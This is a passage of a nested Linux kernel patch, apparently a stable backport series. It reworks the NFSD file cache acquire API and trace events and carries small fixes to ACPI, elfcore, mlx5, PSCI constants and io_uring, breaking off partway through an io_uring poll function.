++		if (refcount_dec_and_test(&nf->nf_ref))
++			nfsd_file_free(nf);
+ 		goto retry;
+ 	}
+ 
+-	nfsd_file_lru_remove(nf);
+ 	this_cpu_inc(nfsd_file_cache_hits);
+ 
+ 	status = nfserrno(nfsd_open_break_lease(file_inode(nf->nf_file), may_flags));
+ out:
+ 	if (status == nfs_ok) {
+-		if (open)
+-			this_cpu_inc(nfsd_file_acquisitions);
++		this_cpu_inc(nfsd_file_acquisitions);
+ 		*pnf = nf;
+ 	} else {
+-		nfsd_file_put(nf);
++		if (refcount_dec_and_test(&nf->nf_ref))
++			nfsd_file_free(nf);
+ 		nf = NULL;
+ 	}
+ 
+ out_status:
+ 	put_cred(key.cred);
+-	if (open)
+-		trace_nfsd_file_acquire(rqstp, key.inode, may_flags, nf, status);
++	trace_nfsd_file_acquire(rqstp, key.inode, may_flags, nf, status);
+ 	return status;
+ 
+ open_file:
+ 	trace_nfsd_file_alloc(nf);
+ 	nf->nf_mark = nfsd_file_mark_find_or_create(nf, key.inode);
+ 	if (nf->nf_mark) {
+-		if (open) {
++		if (file) {
++			get_file(file);
++			nf->nf_file = file;
++			status = nfs_ok;
++			trace_nfsd_file_opened(nf, status);
++		} else {
+ 			status = nfsd_open_verified(rqstp, fhp, may_flags,
+ 						    &nf->nf_file);
+ 			trace_nfsd_file_open(nf, status);
+-		} else
+-			status = nfs_ok;
++		}
+ 	} else
+ 		status = nfserr_jukebox;
+ 	/*
+ 	 * If construction failed, or we raced with a call to unlink()
+ 	 * then unhash.
+ 	 */
+-	if (status != nfs_ok || key.inode->i_nlink == 0)
+-		if (nfsd_file_unhash(nf))
+-			nfsd_file_put_noref(nf);
++	if (status == nfs_ok && key.inode->i_nlink == 0)
++		status = nfserr_jukebox;
++	if (status != nfs_ok)
++		nfsd_file_unhash(nf);
+ 	clear_bit_unlock(NFSD_FILE_PENDING, &nf->nf_flags);
+ 	smp_mb__after_atomic();
+ 	wake_up_bit(&nf->nf_flags, NFSD_FILE_PENDING);
+ 	goto out;
+ }
+ 
++/**
++ * nfsd_file_acquire_gc - Get a struct nfsd_file with an open file
++ * @rqstp: the RPC transaction being executed
++ * @fhp: the NFS filehandle of the file to be opened
++ * @may_flags: NFSD_MAY_ settings for the file
++ * @pnf: OUT: new or found "struct nfsd_file" object
++ *
++ * The nfsd_file object returned by this API is reference-counted
++ * and garbage-collected. The object is retained for a few
++ * seconds after the final nfsd_file_put() in case the caller
++ * wants to re-use it.
++ *
++ * Returns nfs_ok and sets @pnf on success; otherwise an nfsstat in
++ * network byte order is returned.
++ */
++__be32
++nfsd_file_acquire_gc(struct svc_rqst *rqstp, struct svc_fh *fhp,
++		     unsigned int may_flags, struct nfsd_file **pnf)
++{
++	return nfsd_file_do_acquire(rqstp, fhp, may_flags, NULL, pnf, true);
++}
++
+ /**
+  * nfsd_file_acquire - Get a struct nfsd_file with an open file
+  * @rqstp: the RPC transaction being executed
+@@ -1150,6 +1196,10 @@ open_file:
+  * @may_flags: NFSD_MAY_ settings for the file
+  * @pnf: OUT: new or found "struct nfsd_file" object
+  *
++ * The nfsd_file_object returned by this API is reference-counted
++ * but not garbage-collected. The object is unhashed after the
++ * final nfsd_file_put().
++ *
+  * Returns nfs_ok and sets @pnf on success; otherwise an nfsstat in
+  * network byte order is returned.
+  */
+@@ -1157,24 +1207,30 @@ __be32
+ nfsd_file_acquire(struct svc_rqst *rqstp, struct svc_fh *fhp,
+ 		  unsigned int may_flags, struct nfsd_file **pnf)
+ {
+-	return nfsd_file_do_acquire(rqstp, fhp, may_flags, pnf, true);
++	return nfsd_file_do_acquire(rqstp, fhp, may_flags, NULL, pnf, false);
+ }
+ 
+ /**
+- * nfsd_file_create - Get a struct nfsd_file, do not open
++ * nfsd_file_acquire_opened - Get a struct nfsd_file using existing open file
+  * @rqstp: the RPC transaction being executed
+  * @fhp: the NFS filehandle of the file just created
+  * @may_flags: NFSD_MAY_ settings for the file
++ * @file: cached, already-open file (may be NULL)
+  * @pnf: OUT: new or found "struct nfsd_file" object
+  *
++ * Acquire a nfsd_file object that is not GC'ed. If one doesn't already exist,
++ * and @file is non-NULL, use it to instantiate a new nfsd_file instead of
++ * opening a new one.
++ *
+  * Returns nfs_ok and sets @pnf on success; otherwise an nfsstat in
+  * network byte order is returned.
+  */
+ __be32
+-nfsd_file_create(struct svc_rqst *rqstp, struct svc_fh *fhp,
+-		 unsigned int may_flags, struct nfsd_file **pnf)
++nfsd_file_acquire_opened(struct svc_rqst *rqstp, struct svc_fh *fhp,
++			 unsigned int may_flags, struct file *file,
++			 struct nfsd_file **pnf)
+ {
+-	return nfsd_file_do_acquire(rqstp, fhp, may_flags, pnf, false);
++	return nfsd_file_do_acquire(rqstp, fhp, may_flags, file, pnf, false);
+ }
+ 
+ /*
+@@ -1184,7 +1240,7 @@ nfsd_file_create(struct svc_rqst *rqstp, struct svc_fh *fhp,
+  */
+ int nfsd_file_cache_stats_show(struct seq_file *m, void *v)
+ {
+-	unsigned long releases = 0, pages_flushed = 0, evictions = 0;
++	unsigned long releases = 0, evictions = 0;
+ 	unsigned long hits = 0, acquisitions = 0;
+ 	unsigned int i, count = 0, buckets = 0;
+ 	unsigned long lru = 0, total_age = 0;
+@@ -1212,7 +1268,6 @@ int nfsd_file_cache_stats_show(struct seq_file *m, void *v)
+ 		releases += per_cpu(nfsd_file_releases, i);
+ 		total_age += per_cpu(nfsd_file_total_age, i);
+ 		evictions += per_cpu(nfsd_file_evictions, i);
+-		pages_flushed += per_cpu(nfsd_file_pages_flushed, i);
+ 	}
+ 
+ 	seq_printf(m, "total entries: %u\n", count);
+@@ -1226,6 +1281,5 @@ int nfsd_file_cache_stats_show(struct seq_file *m, void *v)
+ 		seq_printf(m, "mean age (ms): %ld\n", total_age / releases);
+ 	else
+ 		seq_printf(m, "mean age (ms): -\n");
+-	seq_printf(m, "pages flushed: %lu\n", pages_flushed);
+ 	return 0;
+ }
+diff --git a/fs/nfsd/filecache.h b/fs/nfsd/filecache.h
+index 357832bac736b..41516a4263ea5 100644
+--- a/fs/nfsd/filecache.h
++++ b/fs/nfsd/filecache.h
+@@ -38,6 +38,7 @@ struct nfsd_file {
+ #define NFSD_FILE_HASHED	(0)
+ #define NFSD_FILE_PENDING	(1)
+ #define NFSD_FILE_REFERENCED	(2)
++#define NFSD_FILE_GC		(3)
+ 	unsigned long		nf_flags;
+ 	struct inode		*nf_inode;	/* don't deref */
+ 	refcount_t		nf_ref;
+@@ -52,13 +53,15 @@ void nfsd_file_cache_shutdown(void);
+ int nfsd_file_cache_start_net(struct net *net);
+ void nfsd_file_cache_shutdown_net(struct net *net);
+ void nfsd_file_put(struct nfsd_file *nf);
+-void nfsd_file_close(struct nfsd_file *nf);
+ struct nfsd_file *nfsd_file_get(struct nfsd_file *nf);
+ void nfsd_file_close_inode_sync(struct inode *inode);
+ bool nfsd_file_is_cached(struct inode *inode);
+-__be32 nfsd_file_acquire(struct svc_rqst *rqstp, struct svc_fh *fhp,
++__be32 nfsd_file_acquire_gc(struct svc_rqst *rqstp, struct svc_fh *fhp,
+ 		  unsigned int may_flags, struct nfsd_file **nfp);
+-__be32 nfsd_file_create(struct svc_rqst *rqstp, struct svc_fh *fhp,
++__be32 nfsd_file_acquire(struct svc_rqst *rqstp, struct svc_fh *fhp,
+ 		  unsigned int may_flags, struct nfsd_file **nfp);
++__be32 nfsd_file_acquire_opened(struct svc_rqst *rqstp, struct svc_fh *fhp,
++		  unsigned int may_flags, struct file *file,
++		  struct nfsd_file **nfp);
+ int nfsd_file_cache_stats_show(struct seq_file *m, void *v);
+ #endif /* _FS_NFSD_FILECACHE_H */
+diff --git a/fs/nfsd/nfs3proc.c b/fs/nfsd/nfs3proc.c
+index 923d9a80df92c..d01b29aba6623 100644
+--- a/fs/nfsd/nfs3proc.c
++++ b/fs/nfsd/nfs3proc.c
+@@ -13,6 +13,7 @@
+ #include "cache.h"
+ #include "xdr3.h"
+ #include "vfs.h"
++#include "filecache.h"
+ 
+ #define NFSDDBG_FACILITY		NFSDDBG_PROC
+ 
+@@ -763,6 +764,7 @@ nfsd3_proc_commit(struct svc_rqst *rqstp)
+ {
+ 	struct nfsd3_commitargs *argp = rqstp->rq_argp;
+ 	struct nfsd3_commitres *resp = rqstp->rq_resp;
++	struct nfsd_file *nf;
+ 
+ 	dprintk("nfsd: COMMIT(3)   %s %u@%Lu\n",
+ 				SVCFH_fmt(&argp->fh),
+@@ -770,8 +772,14 @@ nfsd3_proc_commit(struct svc_rqst *rqstp)
+ 				(unsigned long long) argp->offset);
+ 
+ 	fh_copy(&resp->fh, &argp->fh);
+-	resp->status = nfsd_commit(rqstp, &resp->fh, argp->offset,
++	resp->status = nfsd_file_acquire_gc(rqstp, &resp->fh, NFSD_MAY_WRITE |
++					    NFSD_MAY_NOT_BREAK_LEASE, &nf);
++	if (resp->status)
++		goto out;
++	resp->status = nfsd_commit(rqstp, &resp->fh, nf, argp->offset,
+ 				   argp->count, resp->verf);
++	nfsd_file_put(nf);
++out:
+ 	return rpc_success;
+ }
+ 
+diff --git a/fs/nfsd/nfs4proc.c b/fs/nfsd/nfs4proc.c
+index c7329523a10f1..30a08ec31a703 100644
+--- a/fs/nfsd/nfs4proc.c
++++ b/fs/nfsd/nfs4proc.c
+@@ -731,10 +731,19 @@ nfsd4_commit(struct svc_rqst *rqstp, struct nfsd4_compound_state *cstate,
+ 	     union nfsd4_op_u *u)
+ {
+ 	struct nfsd4_commit *commit = &u->commit;
++	struct nfsd_file *nf;
++	__be32 status;
+ 
+-	return nfsd_commit(rqstp, &cstate->current_fh, commit->co_offset,
++	status = nfsd_file_acquire(rqstp, &cstate->current_fh, NFSD_MAY_WRITE |
++				   NFSD_MAY_NOT_BREAK_LEASE, &nf);
++	if (status != nfs_ok)
++		return status;
++
++	status = nfsd_commit(rqstp, &cstate->current_fh, nf, commit->co_offset,
+ 			     commit->co_count,
+ 			     (__be32 *)commit->co_verf.data);
++	nfsd_file_put(nf);
++	return status;
+ }
+ 
+ static __be32
+diff --git a/fs/nfsd/nfs4state.c b/fs/nfsd/nfs4state.c
+index 52b5552d0d70e..2247d107da90b 100644
+--- a/fs/nfsd/nfs4state.c
++++ b/fs/nfsd/nfs4state.c
+@@ -842,9 +842,9 @@ static void __nfs4_file_put_access(struct nfs4_file *fp, int oflag)
+ 			swap(f2, fp->fi_fds[O_RDWR]);
+ 		spin_unlock(&fp->fi_lock);
+ 		if (f1)
+-			nfsd_file_close(f1);
++			nfsd_file_put(f1);
+ 		if (f2)
+-			nfsd_file_close(f2);
++			nfsd_file_put(f2);
+ 	}
+ }
+ 
+@@ -5211,18 +5211,10 @@ static __be32 nfs4_get_vfs_file(struct svc_rqst *rqstp, struct nfs4_file *fp,
+ 	if (!fp->fi_fds[oflag]) {
+ 		spin_unlock(&fp->fi_lock);
+ 
+-		if (!open->op_filp) {
+-			status = nfsd_file_acquire(rqstp, cur_fh, access, &nf);
+-			if (status != nfs_ok)
+-				goto out_put_access;
+-		} else {
+-			status = nfsd_file_create(rqstp, cur_fh, access, &nf);
+-			if (status != nfs_ok)
+-				goto out_put_access;
+-			nf->nf_file = open->op_filp;
+-			open->op_filp = NULL;
+-			trace_nfsd_file_create(rqstp, access, nf);
+-		}
++		status = nfsd_file_acquire_opened(rqstp, cur_fh, access,
++						  open->op_filp, &nf);
++		if (status != nfs_ok)
++			goto out_put_access;
+ 
+ 		spin_lock(&fp->fi_lock);
+ 		if (!fp->fi_fds[oflag]) {
+diff --git a/fs/nfsd/trace.h b/fs/nfsd/trace.h
+index d4b6839bb459a..4eb4e1039c7f4 100644
+--- a/fs/nfsd/trace.h
++++ b/fs/nfsd/trace.h
+@@ -817,7 +817,8 @@ DEFINE_CLID_EVENT(confirmed_r);
+ 	__print_flags(val, "|",						\
+ 		{ 1 << NFSD_FILE_HASHED,	"HASHED" },		\
+ 		{ 1 << NFSD_FILE_PENDING,	"PENDING" },		\
+-		{ 1 << NFSD_FILE_REFERENCED,	"REFERENCED"})
++		{ 1 << NFSD_FILE_REFERENCED,	"REFERENCED" },		\
++		{ 1 << NFSD_FILE_GC,		"GC" })
+ 
+ DECLARE_EVENT_CLASS(nfsd_file_class,
+ 	TP_PROTO(struct nfsd_file *nf),
+@@ -849,10 +850,11 @@ DEFINE_EVENT(nfsd_file_class, name, \
+ 	TP_PROTO(struct nfsd_file *nf), \
+ 	TP_ARGS(nf))
+ 
+-DEFINE_NFSD_FILE_EVENT(nfsd_file_put_final);
++DEFINE_NFSD_FILE_EVENT(nfsd_file_free);
+ DEFINE_NFSD_FILE_EVENT(nfsd_file_unhash);
+ DEFINE_NFSD_FILE_EVENT(nfsd_file_put);
+-DEFINE_NFSD_FILE_EVENT(nfsd_file_unhash_and_dispose);
++DEFINE_NFSD_FILE_EVENT(nfsd_file_closing);
++DEFINE_NFSD_FILE_EVENT(nfsd_file_unhash_and_queue);
+ 
+ TRACE_EVENT(nfsd_file_alloc,
+ 	TP_PROTO(
+@@ -920,43 +922,6 @@ TRACE_EVENT(nfsd_file_acquire,
+ 	)
+ );
+ 
+-TRACE_EVENT(nfsd_file_create,
+-	TP_PROTO(
+-		const struct svc_rqst *rqstp,
+-		unsigned int may_flags,
+-		const struct nfsd_file *nf
+-	),
+-
+-	TP_ARGS(rqstp, may_flags, nf),
+-
+-	TP_STRUCT__entry(
+-		__field(const void *, nf_inode)
+-		__field(const void *, nf_file)
+-		__field(unsigned long, may_flags)
+-		__field(unsigned long, nf_flags)
+-		__field(unsigned long, nf_may)
+-		__field(unsigned int, nf_ref)
+-		__field(u32, xid)
+-	),
+-
+-	TP_fast_assign(
+-		__entry->nf_inode = nf->nf_inode;
+-		__entry->nf_file = nf->nf_file;
+-		__entry->may_flags = may_flags;
+-		__entry->nf_flags = nf->nf_flags;
+-		__entry->nf_may = nf->nf_may;
+-		__entry->nf_ref = refcount_read(&nf->nf_ref);
+-		__entry->xid = be32_to_cpu(rqstp->rq_xid);
+-	),
+-
+-	TP_printk("xid=0x%x inode=%p may_flags=%s ref=%u nf_flags=%s nf_may=%s nf_file=%p",
+-		__entry->xid, __entry->nf_inode,
+-		show_nfsd_may_flags(__entry->may_flags),
+-		__entry->nf_ref, show_nf_flags(__entry->nf_flags),
+-		show_nfsd_may_flags(__entry->nf_may), __entry->nf_file
+-	)
+-);
+-
+ TRACE_EVENT(nfsd_file_insert_err,
+ 	TP_PROTO(
+ 		const struct svc_rqst *rqstp,
+@@ -1018,8 +983,8 @@ TRACE_EVENT(nfsd_file_cons_err,
+ 	)
+ );
+ 
+-TRACE_EVENT(nfsd_file_open,
+-	TP_PROTO(struct nfsd_file *nf, __be32 status),
++DECLARE_EVENT_CLASS(nfsd_file_open_class,
++	TP_PROTO(const struct nfsd_file *nf, __be32 status),
+ 	TP_ARGS(nf, status),
+ 	TP_STRUCT__entry(
+ 		__field(void *, nf_inode)	/* cannot be dereferenced */
+@@ -1043,34 +1008,16 @@ TRACE_EVENT(nfsd_file_open,
+ 		__entry->nf_file)
+ )
+ 
+-DECLARE_EVENT_CLASS(nfsd_file_search_class,
+-	TP_PROTO(
+-		const struct inode *inode,
+-		unsigned int count
+-	),
+-	TP_ARGS(inode, count),
+-	TP_STRUCT__entry(
+-		__field(const struct inode *, inode)
+-		__field(unsigned int, count)
+-	),
+-	TP_fast_assign(
+-		__entry->inode = inode;
+-		__entry->count = count;
+-	),
+-	TP_printk("inode=%p count=%u",
+-		__entry->inode, __entry->count)
+-);
+-
+-#define DEFINE_NFSD_FILE_SEARCH_EVENT(name)				\
+-DEFINE_EVENT(nfsd_file_search_class, name,				\
++#define DEFINE_NFSD_FILE_OPEN_EVENT(name)					\
++DEFINE_EVENT(nfsd_file_open_class, name,					\
+ 	TP_PROTO(							\
+-		const struct inode *inode,				\
+-		unsigned int count					\
++		const struct nfsd_file *nf,				\
++		__be32 status						\
+ 	),								\
+-	TP_ARGS(inode, count))
++	TP_ARGS(nf, status))
+ 
+-DEFINE_NFSD_FILE_SEARCH_EVENT(nfsd_file_close_inode_sync);
+-DEFINE_NFSD_FILE_SEARCH_EVENT(nfsd_file_close_inode);
++DEFINE_NFSD_FILE_OPEN_EVENT(nfsd_file_open);
++DEFINE_NFSD_FILE_OPEN_EVENT(nfsd_file_opened);
+ 
+ TRACE_EVENT(nfsd_file_is_cached,
+ 	TP_PROTO(
+@@ -1149,7 +1096,6 @@ DEFINE_NFSD_FILE_GC_EVENT(nfsd_file_lru_del_disposed);
+ DEFINE_NFSD_FILE_GC_EVENT(nfsd_file_gc_in_use);
+ DEFINE_NFSD_FILE_GC_EVENT(nfsd_file_gc_writeback);
+ DEFINE_NFSD_FILE_GC_EVENT(nfsd_file_gc_referenced);
+-DEFINE_NFSD_FILE_GC_EVENT(nfsd_file_gc_hashed);
+ DEFINE_NFSD_FILE_GC_EVENT(nfsd_file_gc_disposed);
+ 
+ DECLARE_EVENT_CLASS(nfsd_file_lruwalk_class,
+@@ -1181,6 +1127,53 @@ DEFINE_EVENT(nfsd_file_lruwalk_class, name,				\
+ DEFINE_NFSD_FILE_LRUWALK_EVENT(nfsd_file_gc_removed);
+ DEFINE_NFSD_FILE_LRUWALK_EVENT(nfsd_file_shrinker_removed);
+ 
++TRACE_EVENT(nfsd_file_close,
++	TP_PROTO(
++		const struct inode *inode
++	),
++	TP_ARGS(inode),
++	TP_STRUCT__entry(
++		__field(const void *, inode)
++	),
++	TP_fast_assign(
++		__entry->inode = inode;
++	),
++	TP_printk("inode=%p",
++		__entry->inode
++	)
++);
++
++TRACE_EVENT(nfsd_file_fsync,
++	TP_PROTO(
++		const struct nfsd_file *nf,
++		int ret
++	),
++	TP_ARGS(nf, ret),
++	TP_STRUCT__entry(
++		__field(void *, nf_inode)
++		__field(int, nf_ref)
++		__field(int, ret)
++		__field(unsigned long, nf_flags)
++		__field(unsigned char, nf_may)
++		__field(struct file *, nf_file)
++	),
++	TP_fast_assign(
++		__entry->nf_inode = nf->nf_inode;
++		__entry->nf_ref = refcount_read(&nf->nf_ref);
++		__entry->ret = ret;
++		__entry->nf_flags = nf->nf_flags;
++		__entry->nf_may = nf->nf_may;
++		__entry->nf_file = nf->nf_file;
++	),
++	TP_printk("inode=%p ref=%d flags=%s may=%s nf_file=%p ret=%d",
++		__entry->nf_inode,
++		__entry->nf_ref,
++		show_nf_flags(__entry->nf_flags),
++		show_nfsd_may_flags(__entry->nf_may),
++		__entry->nf_file, __entry->ret
++	)
++);
++
+ #include "cache.h"
+ 
+ TRACE_DEFINE_ENUM(RC_DROPIT);
+diff --git a/fs/nfsd/vfs.c b/fs/nfsd/vfs.c
+index 849a720ab43f0..2934ab1d9862b 100644
+--- a/fs/nfsd/vfs.c
++++ b/fs/nfsd/vfs.c
+@@ -1085,7 +1085,7 @@ __be32 nfsd_read(struct svc_rqst *rqstp, struct svc_fh *fhp,
+ 	__be32 err;
+ 
+ 	trace_nfsd_read_start(rqstp, fhp, offset, *count);
+-	err = nfsd_file_acquire(rqstp, fhp, NFSD_MAY_READ, &nf);
++	err = nfsd_file_acquire_gc(rqstp, fhp, NFSD_MAY_READ, &nf);
+ 	if (err)
+ 		return err;
+ 
+@@ -1117,7 +1117,7 @@ nfsd_write(struct svc_rqst *rqstp, struct svc_fh *fhp, loff_t offset,
+ 
+ 	trace_nfsd_write_start(rqstp, fhp, offset, *cnt);
+ 
+-	err = nfsd_file_acquire(rqstp, fhp, NFSD_MAY_WRITE, &nf);
++	err = nfsd_file_acquire_gc(rqstp, fhp, NFSD_MAY_WRITE, &nf);
+ 	if (err)
+ 		goto out;
+ 
+@@ -1133,6 +1133,7 @@ out:
+  * nfsd_commit - Commit pending writes to stable storage
+  * @rqstp: RPC request being processed
+  * @fhp: NFS filehandle
++ * @nf: target file
+  * @offset: raw offset from beginning of file
+  * @count: raw count of bytes to sync
+  * @verf: filled in with the server's current write verifier
+@@ -1149,19 +1150,13 @@ out:
+  *   An nfsstat value in network byte order.
+  */
+ __be32
+-nfsd_commit(struct svc_rqst *rqstp, struct svc_fh *fhp, u64 offset,
+-	    u32 count, __be32 *verf)
++nfsd_commit(struct svc_rqst *rqstp, struct svc_fh *fhp, struct nfsd_file *nf,
++	    u64 offset, u32 count, __be32 *verf)
+ {
++	__be32			err = nfs_ok;
+ 	u64			maxbytes;
+ 	loff_t			start, end;
+ 	struct nfsd_net		*nn;
+-	struct nfsd_file	*nf;
+-	__be32			err;
+-
+-	err = nfsd_file_acquire(rqstp, fhp,
+-			NFSD_MAY_WRITE|NFSD_MAY_NOT_BREAK_LEASE, &nf);
+-	if (err)
+-		goto out;
+ 
+ 	/*
+ 	 * Convert the client-provided (offset, count) range to a
+@@ -1202,8 +1197,6 @@ nfsd_commit(struct svc_rqst *rqstp, struct svc_fh *fhp, u64 offset,
+ 	} else
+ 		nfsd_copy_write_verifier(verf, nn);
+ 
+-	nfsd_file_put(nf);
+-out:
+ 	return err;
+ }
+ 
+diff --git a/fs/nfsd/vfs.h b/fs/nfsd/vfs.h
+index 120521bc7b247..9744b041105b5 100644
+--- a/fs/nfsd/vfs.h
++++ b/fs/nfsd/vfs.h
+@@ -88,7 +88,8 @@ __be32		nfsd_access(struct svc_rqst *, struct svc_fh *, u32 *, u32 *);
+ __be32		nfsd_create_setattr(struct svc_rqst *rqstp, struct svc_fh *fhp,
+ 				struct svc_fh *resfhp, struct nfsd_attrs *iap);
+ __be32		nfsd_commit(struct svc_rqst *rqst, struct svc_fh *fhp,
+-				u64 offset, u32 count, __be32 *verf);
++				struct nfsd_file *nf, u64 offset, u32 count,
++				__be32 *verf);
+ #ifdef CONFIG_NFSD_V4
+ __be32		nfsd_getxattr(struct svc_rqst *rqstp, struct svc_fh *fhp,
+ 			    char *name, void **bufp, int *lenp);
+diff --git a/include/acpi/acpi_bus.h b/include/acpi/acpi_bus.h
+index c09d72986968a..ab2d6266038a0 100644
+--- a/include/acpi/acpi_bus.h
++++ b/include/acpi/acpi_bus.h
+@@ -230,7 +230,8 @@ struct acpi_pnp_type {
+ 	u32 hardware_id:1;
+ 	u32 bus_address:1;
+ 	u32 platform_id:1;
+-	u32 reserved:29;
++	u32 backlight:1;
++	u32 reserved:28;
+ };
+ 
+ struct acpi_device_pnp {
+diff --git a/include/linux/elfcore.h b/include/linux/elfcore.h
+index 346a8b56cdc83..79e26b18bf0ef 100644
+--- a/include/linux/elfcore.h
++++ b/include/linux/elfcore.h
+@@ -114,14 +114,14 @@ static inline int elf_core_copy_task_fpregs(struct task_struct *t, struct pt_reg
+  * Dumping its extra ELF program headers includes all the other information
+  * a debugger needs to easily find how the gate DSO was being used.
+  */
+-extern Elf_Half elf_core_extra_phdrs(void);
++extern Elf_Half elf_core_extra_phdrs(struct coredump_params *cprm);
+ extern int
+ elf_core_write_extra_phdrs(struct coredump_params *cprm, loff_t offset);
+ extern int
+ elf_core_write_extra_data(struct coredump_params *cprm);
+-extern size_t elf_core_extra_data_size(void);
++extern size_t elf_core_extra_data_size(struct coredump_params *cprm);
+ #else
+-static inline Elf_Half elf_core_extra_phdrs(void)
++static inline Elf_Half elf_core_extra_phdrs(struct coredump_params *cprm)
+ {
+ 	return 0;
+ }
+@@ -136,7 +136,7 @@ static inline int elf_core_write_extra_data(struct coredump_params *cprm)
+ 	return 1;
+ }
+ 
+-static inline size_t elf_core_extra_data_size(void)
++static inline size_t elf_core_extra_data_size(struct coredump_params *cprm)
+ {
+ 	return 0;
+ }
+diff --git a/include/linux/mlx5/driver.h b/include/linux/mlx5/driver.h
+index 06cbad166225a..ad55470a9fb97 100644
+--- a/include/linux/mlx5/driver.h
++++ b/include/linux/mlx5/driver.h
+@@ -315,7 +315,7 @@ struct mlx5_cmd {
+ 	struct mlx5_cmd_debug dbg;
+ 	struct cmd_msg_cache cache[MLX5_NUM_COMMAND_CACHES];
+ 	int checksum_disabled;
+-	struct mlx5_cmd_stats *stats;
++	struct mlx5_cmd_stats stats[MLX5_CMD_OP_MAX];
+ };
+ 
+ struct mlx5_cmd_mailbox {
+diff --git a/include/linux/mtd/spi-nor.h b/include/linux/mtd/spi-nor.h
+index 42218a1164f6d..f92bf7f7a7543 100644
+--- a/include/linux/mtd/spi-nor.h
++++ b/include/linux/mtd/spi-nor.h
+@@ -7,7 +7,6 @@
+ #define __LINUX_MTD_SPI_NOR_H
+ 
+ #include <linux/bitops.h>
+-#include <linux/mtd/cfi.h>
+ #include <linux/mtd/mtd.h>
+ #include <linux/spi/spi-mem.h>
+ 
+diff --git a/include/linux/tpm_eventlog.h b/include/linux/tpm_eventlog.h
+index 20c0ff54b7a0d..7d68a5cc58816 100644
+--- a/include/linux/tpm_eventlog.h
++++ b/include/linux/tpm_eventlog.h
+@@ -198,8 +198,8 @@ static __always_inline int __calc_tpm2_event_size(struct tcg_pcr_event2_head *ev
+ 	 * The loop below will unmap these fields if the log is larger than
+ 	 * one page, so save them here for reference:
+ 	 */
+-	count = READ_ONCE(event->count);
+-	event_type = READ_ONCE(event->event_type);
++	count = event->count;
++	event_type = event->event_type;
+ 
+ 	/* Verify that it's the log header */
+ 	if (event_header->pcr_idx != 0 ||
+diff --git a/include/uapi/linux/psci.h b/include/uapi/linux/psci.h
+index 3511095c2702b..42a40ad3fb622 100644
+--- a/include/uapi/linux/psci.h
++++ b/include/uapi/linux/psci.h
+@@ -58,7 +58,7 @@
+ 
+ #define PSCI_1_1_FN_SYSTEM_RESET2		PSCI_0_2_FN(18)
+ #define PSCI_1_1_FN_MEM_PROTECT			PSCI_0_2_FN(19)
+-#define PSCI_1_1_FN_MEM_PROTECT_CHECK_RANGE	PSCI_0_2_FN(19)
++#define PSCI_1_1_FN_MEM_PROTECT_CHECK_RANGE	PSCI_0_2_FN(20)
+ 
+ #define PSCI_1_0_FN64_CPU_DEFAULT_SUSPEND	PSCI_0_2_FN64(12)
+ #define PSCI_1_0_FN64_NODE_HW_STATE		PSCI_0_2_FN64(13)
+@@ -67,7 +67,7 @@
+ #define PSCI_1_0_FN64_STAT_COUNT		PSCI_0_2_FN64(17)
+ 
+ #define PSCI_1_1_FN64_SYSTEM_RESET2		PSCI_0_2_FN64(18)
+-#define PSCI_1_1_FN64_MEM_PROTECT_CHECK_RANGE	PSCI_0_2_FN64(19)
++#define PSCI_1_1_FN64_MEM_PROTECT_CHECK_RANGE	PSCI_0_2_FN64(20)
+ 
+ /* PSCI v0.2 power state encoding for CPU_SUSPEND function */
+ #define PSCI_0_2_POWER_STATE_ID_MASK		0xffff
+diff --git a/io_uring/fdinfo.c b/io_uring/fdinfo.c
+index 2e04850a657b0..882bd56b01ed0 100644
+--- a/io_uring/fdinfo.c
++++ b/io_uring/fdinfo.c
+@@ -170,12 +170,11 @@ static __cold void __io_uring_show_fdinfo(struct io_ring_ctx *ctx,
+ 		xa_for_each(&ctx->personalities, index, cred)
+ 			io_uring_show_cred(m, index, cred);
+ 	}
+-	if (has_lock)
+-		mutex_unlock(&ctx->uring_lock);
+ 
+ 	seq_puts(m, "PollList:\n");
+ 	for (i = 0; i < (1U << ctx->cancel_table.hash_bits); i++) {
+ 		struct io_hash_bucket *hb = &ctx->cancel_table.hbs[i];
++		struct io_hash_bucket *hbl = &ctx->cancel_table_locked.hbs[i];
+ 		struct io_kiocb *req;
+ 
+ 		spin_lock(&hb->lock);
+@@ -183,8 +182,17 @@ static __cold void __io_uring_show_fdinfo(struct io_ring_ctx *ctx,
+ 			seq_printf(m, "  op=%d, task_works=%d\n", req->opcode,
+ 					task_work_pending(req->task));
+ 		spin_unlock(&hb->lock);
++
++		if (!has_lock)
++			continue;
++		hlist_for_each_entry(req, &hbl->list, hash_node)
++			seq_printf(m, "  op=%d, task_works=%d\n", req->opcode,
++					task_work_pending(req->task));
+ 	}
+ 
++	if (has_lock)
++		mutex_unlock(&ctx->uring_lock);
++
+ 	seq_puts(m, "CqOverflowList:\n");
+ 	spin_lock(&ctx->completion_lock);
+ 	list_for_each_entry(ocqe, &ctx->cq_overflow_list, list) {
+diff --git a/io_uring/io-wq.c b/io_uring/io-wq.c
+index 6f1d0e5df23ad..411bb2d1acd45 100644
+--- a/io_uring/io-wq.c
++++ b/io_uring/io-wq.c
+@@ -1230,6 +1230,12 @@ static void io_wq_cancel_tw_create(struct io_wq *wq)
+ 
+ 		worker = container_of(cb, struct io_worker, create_work);
+ 		io_worker_cancel_cb(worker);
++		/*
++		 * Only the worker continuation helper has worker allocated and
++		 * hence needs freeing.
++		 */
++		if (cb->func == create_worker_cont)
++			kfree(worker);
+ 	}
+ }
+ 
+diff --git a/io_uring/poll.c b/io_uring/poll.c
+index fded1445a803b..f2f9f174fc620 100644
+--- a/io_uring/poll.c
++++ b/io_uring/poll.c
+@@ -223,22 +223,23 @@ enum {
+ 	IOU_POLL_DONE = 0,
+ 	IOU_POLL_NO_ACTION = 1,
+ 	IOU_POLL_REMOVE_POLL_USE_RES = 2,
++	IOU_POLL_REISSUE = 3,
+ };
+ 
+ /*
+  * All poll tw should go through this. Checks for poll events, manages
+  * references, does rewait, etc.
+  *
+- * Returns a negative error on failure. IOU_POLL_NO_ACTION when no action require,
+- * which is either spurious wakeup or multishot CQE is served.
+- * IOU_POLL_DONE when it's done with the request, then the mask is stored in req->cqe.res.
+- * IOU_POLL_REMOVE_POLL_USE_RES indicates to remove multishot poll and that the result
+- * is stored in req->cqe.
++ * Returns a negative error on failure. IOU_POLL_NO_ACTION when no action
++ * require, which is either spurious wakeup or multishot CQE is served.
++ * IOU_POLL_DONE when it's done with the request, then the mask is stored in
++ * req->cqe.res. IOU_POLL_REMOVE_POLL_USE_RES indicates to remove multishot
++ * poll and that the result is stored in req->cqe.
+  */
+ static int io_poll_check_events(struct io_kiocb *req, bool *locked)
+ {
